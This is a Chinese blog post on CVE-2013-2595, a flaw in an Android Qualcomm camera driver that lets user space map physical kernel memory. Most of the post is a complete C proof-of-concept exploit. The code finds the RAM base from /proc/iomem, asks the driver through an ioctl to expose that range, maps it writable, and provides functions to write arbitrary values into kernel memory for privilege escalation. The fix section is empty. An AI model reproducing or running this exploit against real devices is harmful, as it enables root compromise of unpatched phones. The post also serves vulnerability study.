Uncontrolled memory mapping in camera driver (CVE-2013-2595)
版权声明:本文为博主原创文章。未经博主同意不得转载。
https://blog.csdn.net/hu3167343/article/details/34434235
/*
本文章由 莫灰灰 编写,转载请注明出处。
作者:莫灰灰 邮箱:
minzhenfei@163.com
*/
1.漏洞描述
漏洞的产生主要是由于摄像头驱动提供了几个用于用户空间调用的接口。
用户空间只要使用诸如ioctl或者mmap这类系统调用,就能对摄像头驱动产生影响。黑客能够非常容易地使用事先构造好的参数将物理内存map到用户空间,并提升权限。
2.影响设备
绝大多数使用2013年5月1日之前Linux内核的安卓系统
3.PoC
/*
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/fb.h>
#include "msm_cameraconfig.h"
#define MSM_CAM_IOCTL_MAGIC 'm'
/*
 * Argument block for MSM_CAM_IOCTL_SET_MEM_MAP_INFO as the PoC fills it in
 * msm_cameraconfig_mmap(): cookie is set to the detected physical RAM base,
 * length to KERNEL_SIZE and mem_type to MSM_MEM_MMAP. That the driver takes
 * the physical range straight from user space is the defect tracked as
 * CVE-2013-2595.
 */
struct msm_mem_map_info {
uint32_t cookie; /* physical address the PoC asks the driver to expose */
uint32_t length; /* size of the region in bytes */
uint32_t mem_type; /* set to MSM_MEM_MMAP here; meaning is driver-defined */
};
/*
 * Request number 41 under the 'm' magic. NOTE(review): the ioctl is encoded
 * with a pointer type (struct msm_mem_map_info *), so the size field of the
 * request covers a pointer rather than the struct — confirm this matches the
 * driver's own header before relying on it.
 */
#define MSM_CAM_IOCTL_SET_MEM_MAP_INFO \
_IOR(MSM_CAM_IOCTL_MAGIC, 41, struct msm_mem_map_info *)
#define MSM_MEM_MMAP 0
/* Kernel virtual base; msm_cameraconfig_convert_to_mmaped_address() subtracts it. */
#define KERNEL_VIRT_ADDRESS 0xc0000000
/* Address hint handed to mmap() for the window. */
#define MAPPED_BASE 0x20000000
/* Bytes requested both in the ioctl and in mmap()/munmap(). */
#define KERNEL_SIZE 0x02000000
/*
 * Physical RAM base used as ioctl cookie and mmap offset. Set either by
 * detect_kernel_phys_parameters() (from /proc/iomem or /proc/cpuinfo) or
 * explicitly through msm_cameraconfig_set_kernel_phys_offset(); read by
 * msm_cameraconfig_mmap().
 */
static bool kernel_phys_offset_initialized = false;
static unsigned long kernel_phys_offset = 0;
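/*
 * Read the "CPU implementer" field from /proc/cpuinfo.
 *
 * Returns the field parsed as a hexadecimal number (ARM kernels print it as
 * e.g. "0x51"), or 0 when the file cannot be opened or the field is absent.
 */
static int
get_cpu_implementer(void)
{
    static const char key[] = "CPU implementer";
    char line[BUFSIZ];
    long implementer = 0;
    FILE *fp = fopen("/proc/cpuinfo", "r");

    if (!fp) {
        printf("Failed to open /proc/cpuinfo due to %s.", strerror(errno));
        return 0;
    }
    /* fgets() bounds each read; a fscanf("%[^:]") into a fixed buffer does not. */
    while (fgets(line, sizeof line, fp) != NULL) {
        if (strncmp(line, key, sizeof key - 1) != 0) {
            continue;
        }
        char *sep = strchr(line, ':');
        if (sep != NULL) {
            /* base 16 accepts the "0x" prefix and skips leading blanks */
            implementer = strtol(sep + 1, NULL, 16);
        }
        break;
    }
    fclose(fp);
    return (int)implementer;
}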
/*
 * Fallback guess for the physical RAM base, keyed on the CPU implementer
 * code: Qualcomm parts ('Q', 0x51) get 0x80200000, anything else
 * 0x80000000. Only consulted when /proc/iomem yields no "System RAM" entry.
 */
static unsigned long int
detect_kernel_phys_address_from_cpuinfo(void)
{
    const int qualcomm = 'Q'; /* 0x51 */
    unsigned long int phys = 0x80000000;

    if (get_cpu_implementer() == qualcomm) {
        phys = 0x80200000;
    }
    return phys;
}
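/*
 * Find the physical start of the "System RAM" range that holds the kernel
 * by scanning /proc/iomem.
 *
 * Lines look like "80000000-8fffffff : System RAM", with the kernel's own
 * ranges ("Kernel code", ...) listed beneath the range they live in. The
 * scan remembers the most recent "System RAM" start and stops at the first
 * "Kernel" entry, so the result is the RAM range containing the kernel.
 *
 * Returns 0 if the file cannot be opened or no "System RAM" line precedes
 * the kernel entries.
 */
static unsigned long int
get_system_ram_address_from_iomem(void)
{
    char line[BUFSIZ];
    unsigned long int system_ram_address = 0;
    FILE *fp = fopen("/proc/iomem", "r");

    if (!fp) {
        printf("Failed to open /proc/iomem due to %s.\n", strerror(errno));
        return 0;
    }
    /* Line-at-a-time parsing: a malformed line is skipped instead of
     * stalling an unbounded fscanf() loop, and the name is bounded. */
    while (fgets(line, sizeof line, fp) != NULL) {
        unsigned long int start = 0, end = 0;
        int name_pos = 0;

        line[strcspn(line, "\n")] = '\0';
        /* %n records where the name begins; it does not count as a conversion. */
        if (sscanf(line, "%lx-%lx : %n", &start, &end, &name_pos) != 2 || name_pos == 0) {
            continue;
        }
        const char *name = line + name_pos;
        if (strcmp(name, "System RAM") == 0) {
            system_ram_address = start;
        } else if (strncmp(name, "Kernel", 6) == 0) {
            break;
        }
    }
    fclose(fp);
    return system_ram_address;
}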
/*
 * Populate kernel_phys_offset: prefer the "System RAM" start reported by
 * /proc/iomem and fall back to the cpuinfo-based guess. Always succeeds
 * and marks the offset as initialized.
 */
static bool
detect_kernel_phys_parameters(void)
{
    unsigned long int phys = get_system_ram_address_from_iomem();

    if (phys == 0) {
        phys = detect_kernel_phys_address_from_cpuinfo();
    }
    kernel_phys_offset = phys;
    kernel_phys_offset_initialized = true;
    return true;
}
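/*
 * Translate a kernel virtual address into the matching address inside the
 * window returned by msm_cameraconfig_mmap().
 *
 * The window is assumed to start at KERNEL_VIRT_ADDRESS, so the result is
 * mmap_base_address + (address - KERNEL_VIRT_ADDRESS). The intermediate
 * casts keep the original 32-bit arithmetic (the PoC targets 32-bit ARM);
 * on a 64-bit build the input is truncated exactly as before.
 *
 * Arithmetic is done on a char pointer: adding to a void * is a GNU
 * extension, not standard C.
 */
void *
msm_cameraconfig_convert_to_mmaped_address(void *address, void *mmap_base_address)
{
    uint32_t kernel_address = (uint32_t)(uintptr_t)address;
    return (char *)mmap_base_address + kernel_address - KERNEL_VIRT_ADDRESS;
}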
/*
 * Store one int at a kernel virtual address through the camera-driver
 * mapping.
 *
 * address: kernel virtual address; converted into the window by
 *          msm_cameraconfig_convert_to_mmaped_address().
 * value:   the int written there.
 *
 * Returns false when msm_cameraconfig_mmap() fails, true after the write
 * and teardown. This is the primitive the CVE-2013-2595 writeup is about:
 * a write into kernel memory reachable from user space through the
 * MAP_SHARED window that msm_cameraconfig_mmap() obtains from the driver.
 */
bool
msm_cameraconfig_write_value_at_address(unsigned long int address, int value)
{
void *mmap_address = NULL;
int *write_address;
int fd_video;
int fd_config;
mmap_address = msm_cameraconfig_mmap(&fd_video, &fd_config);
if (mmap_address == MAP_FAILED) {
return false;
}
write_address = msm_cameraconfig_convert_to_mmaped_address((void*)address, mmap_address);
*write_address = value; /* the store goes through the shared mapping, i.e. into physical RAM */
msm_cameraconfig_munmap(mmap_address, fd_video, fd_config);
return true;
}
/*
 * Invoke exploit_callback with the window from msm_cameraconfig_mmap() as
 * its first argument and user_data as its second, then tear the window
 * down again.
 *
 * Returns false if the mapping could not be created, otherwise the
 * callback's own result. The callback must not retain mmap_base_address;
 * it is unmapped before this function returns.
 */
bool
msm_cameraconfig_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data),
void *user_data)
{
void *mapped_address = NULL;
int fd_video;
int fd_config;
bool success;
mapped_address = msm_cameraconfig_mmap(&fd_video, &fd_config);
if (mapped_address == MAP_FAILED) {
return false;
}
success = exploit_callback(mapped_address, user_data);
msm_cameraconfig_munmap(mapped_address, fd_video, fd_config);
return success;
}
/*
 * Override the auto-detected physical RAM base that msm_cameraconfig_mmap()
 * uses as both the ioctl cookie and the mmap() offset, and skip detection.
 *
 * offset is an int even though the detected defaults (0x80000000 and up)
 * exceed INT_MAX; on the 32-bit target the conversion keeps the same bit
 * pattern. NOTE(review): on an LP64 build a negative int sign-extends into
 * the unsigned long — confirm before reusing this elsewhere.
 */
void
msm_cameraconfig_set_kernel_phys_offset(int offset)
{
kernel_phys_offset_initialized = true;
kernel_phys_offset = offset;
}
/*
 * Map KERNEL_SIZE bytes of physical RAM starting at kernel_phys_offset into
 * this process via the MSM camera config device.
 *
 * Sequence: open /dev/video0 and /dev/msm_camera/config0, hand the driver a
 * msm_mem_map_info whose cookie/length are chosen by this program, then
 * mmap() the config fd at that same physical offset. The driver honouring a
 * user-supplied physical range without validation is the defect behind
 * CVE-2013-2595; per the writeup the kernel fix simply removed this code
 * path.
 *
 * fd_video, fd_config: out parameters that receive the open descriptors on
 * success and -1 after the error path closes them.
 * Returns the window base, or MAP_FAILED when the physical offset is
 * unknown or any open/ioctl/mmap step fails.
 *
 * NOTE(review): when the first open() fails, *fd_config has not been
 * assigned yet, so error_exit reads whatever the caller left in it (both
 * callers in this file pass an uninitialized int).
 */
void *
msm_cameraconfig_mmap(int *fd_video, int *fd_config)
{
struct msm_mem_map_info args;
void *mapped_address;
if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {
printf("This machine can not use msm_cameraconfig exploit.\n");
return MAP_FAILED;
}
*fd_video = open("/dev/video0", O_RDWR);
if (*fd_video < 0) {
goto error_exit;
}
*fd_config = open("/dev/msm_camera/config0", O_RDWR);
if (*fd_config < 0) {
goto error_exit;
}
/* Physical base and size come from this program, not from any driver policy. */
args.cookie = kernel_phys_offset;
args.length = KERNEL_SIZE;
args.mem_type = MSM_MEM_MMAP;
if (ioctl(*fd_config, MSM_CAM_IOCTL_SET_MEM_MAP_INFO, &args) < 0) {
goto error_exit;
}
/* MAP_SHARED so that stores land in the mapped physical pages; MAPPED_BASE is only a hint. */
mapped_address = mmap((void *)MAPPED_BASE, KERNEL_SIZE, PROT_READ | PROT_WRITE,
MAP_SHARED, *fd_config, kernel_phys_offset);
if (mapped_address == MAP_FAILED) {
goto error_exit;
}
return mapped_address;
error_exit:
if (*fd_config >= 0) {
close(*fd_config);
*fd_config = -1;
}
if (*fd_video >= 0) {
close(*fd_video);
*fd_video = -1;
}
return MAP_FAILED;
}
/*
 * Undo msm_cameraconfig_mmap(): unmap the KERNEL_SIZE window (skipped when
 * address is MAP_FAILED) and close both device descriptors.
 *
 * Returns 0 on success. If munmap() fails its negative result is returned
 * and the descriptors are left open.
 */
int
msm_cameraconfig_munmap(void *address, int fd_video, int fd_config)
{
    int rc = 0;

    if (address != MAP_FAILED) {
        rc = munmap(address, KERNEL_SIZE);
    }
    if (rc < 0) {
        printf("Failed to munmap due to %s\n", strerror(errno));
        return rc;
    }
    close(fd_config);
    close(fd_video);
    return 0;
}
4.漏洞修复
5.总结
1.漏洞的利用其实和Root exploit on Exynos(CVE-2012-6422)几乎相同,只是map物理内存的方法不同罢了。
2.其次,这个漏洞的补丁也非常奇特,只是简单地把相关漏洞代码删掉了。
估计是胡乱抄代码模板导致的漏洞,哈哈。